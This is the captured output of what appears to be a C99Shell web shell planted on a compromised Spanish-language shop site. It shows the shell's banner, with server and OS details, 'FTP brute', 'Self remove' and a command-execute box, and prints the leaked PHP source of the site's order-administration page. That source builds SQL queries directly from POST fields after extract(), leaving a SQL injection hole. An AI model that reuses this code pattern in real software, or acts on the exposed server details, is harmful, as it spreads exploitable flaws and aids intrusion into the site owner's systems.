www.memoriacelular.com

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!
Software: Apache. PHP/5.3.29 uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 Safe-mode: OFF (not secure) /home/memoriacel/public_html/2018/panel/ drwxr-xr-x Free 985.28 GB of 1859.98 GB (52.97%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?
$pagina_actual="administrar-productos";
$categoria_actual="productos";
require_once("includes/config.php");
require_once("includes/funciones.php");

if (isset($_POST["id"])){
    
    extract($_POST, EXTR_SKIP);
        
    $result=$mysqli->query("
    UPDATE cotizacion SET 
    codigo='".$codigo."',
    fecha_envio='".$fecha_envio."',
    estado='".$estado."'
    WHERE id='$id'
    ");        
    header('Location: administrar-pedidos.php?exito=si');
}

if (isset($_GET["id"])){
    $id=cadena_segura($_GET["id"],11);
    
    $result=$mysqli->query("
    SELECT c.id, c.fecha, c.detalle, c.total, c.estado, u.nombre, u.apellido, u.email, c.codigo, c.fecha_envio
    FROM cotizacion c
    INNER JOIN usuario u ON u.id=c.id_usuario
    WHERE c.id='$id'
    ");
    $item = mysqli_fetch_assoc($result);
    
    $productos = $mysqli->query("
SELECT p.id, p.titulo, rpc.cantidad, rpc.precio
FROM producto p
INNER JOIN renglon_producto_cotizacion rpc ON rpc.id_producto=p.id
WHERE rpc.id_cotizacion='".$item["id"]."'
");        
?>
<div class="modal-content">
    <form method="post" action="actualizar-pedido.php">
    <input type="hidden" name="id" value="<?=$id?>">
    <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"></h4>
    </div>
    <div class="modal-body">
        <div class="form-group">
        <table border="1" class="table-padding-10">
            <thead>
              <tr><th>Codigo</th>
              <th>
                Producto
              </th>
              <th>
                Cant</th>
              <th>
                Precio/u</th>
              <th>
                Total
              </th>
              </tr>
            </thead>
            <tbody>
            <? while ($producto = mysqli_fetch_assoc($productos)){?>
              <tr>
                <td>
                  #<?=$producto["id"]?>
                </td>
                <td>
                  <?=utf8_encode($producto["titulo"])?>
                </td>
                <td>
                  <?=$producto["cantidad"]?>
                </td>
                <td>
                  <?=$producto["precio"]?>
                </td>
                <td>
                  <?=$producto["precio"]*$producto["cantidad"]?>
                </td>
              </tr>
            <? }?>
            </tbody>
        </table> 
        </div>
        
        <div class="form-group">
            <label>Estado</label>
            <select class="form-control" name="estado">
                <option value="pendiente" <?=$item["estado"]=="pendiente"?"selected":""?>>Pendiente</option>
                <option value="enviado" <?=$item["estado"]=="enviado"?"selected":""?>>Enviado</option>
                <option value="finalizado" <?=$item["estado"]=="finalizado"?"selected":""?>>Finalizado</option>
            </select>
        </div>   
          
        <div class="form-group">
            <label>Código de seguimiento</label>
            <input class="form-control" name="codigo" value="<?=utf8_encode($item["codigo"])?>">
        </div>   
        
        <div class="form-group">
            <label>Fecha de envio</label>
            <input class="form-control" name="fecha_envio" type="date" value="<?=($item["fecha_envio"])?>">
        </div>       
        
    </div>
    <div class="modal-footer">
        <a href="#" class="btn btn-white" data-dismiss="modal">Cerrar</a>
        <input type="submit" class="btn btn-primary" value="Actualizar">
    </div>
    </form>
</div><!-- /.modal-content -->
<? }?>

:: Command execute ::
Enter:	Select: